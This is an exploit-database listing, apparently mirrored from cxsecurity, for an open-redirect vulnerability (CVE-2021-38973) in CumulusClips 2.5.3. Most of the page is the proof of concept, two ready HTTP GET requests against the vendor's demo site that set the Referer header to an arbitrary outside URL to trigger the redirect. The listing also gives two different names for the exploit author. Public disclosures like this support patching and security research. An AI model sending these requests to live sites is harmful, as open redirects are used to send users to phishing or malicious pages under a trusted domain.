CumulusClips PHP Script HTTP Referer Header Field Open Redirect Vulnerability

CVE	Category	Price	Severity
CVE-2021-38973	CWE-601	Not specified	Medium

Author	Risk	Exploitation Type	Date
Emre Selcuk	Medium	Remote	2017-10-08

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017100073

Below is a copy:

CumulusClips PHP Script HTTP Referer Header Field Open Redirect Vulnerability

# Exploit Title: CumulusClips PHP Script HTTP Referer Header Field Open Redirect Vulnerability
# Date: 2017-10-08
# Exploit Author: Esecurity.ir 
# Exploit Author Web Site: http://esecurity.ir 
# Vendor Homepage: http://cumulusclips.org
# Version: 2.5.3 
# Special thanks : Meisam Monsef - Email : [email protected] - TelgramID : @meisamrce

Exploit : 
GET /language/set/en/?action=set
Host: demo.cumulusclips.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Referer: http://www.your-url.com/


Demo : 
GET /language/set/en/?action=set
Host: demo.cumulusclips.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Referer: https://google.com/

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum